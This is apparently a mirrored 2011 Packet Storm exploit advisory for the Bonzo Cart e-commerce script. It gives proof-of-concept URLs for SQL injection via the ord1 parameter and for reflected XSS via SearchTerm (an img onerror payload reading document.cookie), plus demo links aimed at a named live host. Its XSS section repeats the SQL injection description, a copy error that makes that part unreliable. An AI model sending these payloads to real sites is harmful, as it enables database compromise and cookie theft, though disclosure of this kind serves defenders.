Lucene search
K

Bonzo Cart Cross Site Scripting / SQL Injection

🗓️ 20 Aug 2011 00:00:00Reported by Eyup CELIKType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Bonzo Cart SQL Injection and Cross Site Scriptin

Code
`==============================  
# Exploit Title: Bonzo Cart (E-Commerce System) SQL Injection  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.turnkeycentral.com  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Example  
searchresults.php?ord1=<SQL Injection   
Code>&ord2=asc&search1=&SearchTerm=&where=ItemName  
  
Exploit:  
searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName  
  
Demo:  
http://demo.turnkeycentral.com/bonzacart/searchresults.php?ord1='1&ord2=asc&search1=&SearchTerm=&where=ItemName  
  
==============================  
# Exploit Title: Bonzo Cart (E-Commerce System) Cross Site Scripting  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.turnkeycentral.com  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
SQL Injection can be done using the command input  
  
Example  
/searchresults.php?SearchTerm=<XSS   
Code>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14  
  
Exploit:  
/searchresults.php?SearchTerm="%2F><%2Fa><%2F><img+src%3D1.gif+onerror%3Dalert(document.cookie)>&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14  
  
Demo:  
http://demo.turnkeycentral.com/bonzacart/searchresults.php?SearchTerm=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&where=ItemName&ord1=ItemName&ord2=asc&search1.x=50&search1.y=14  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation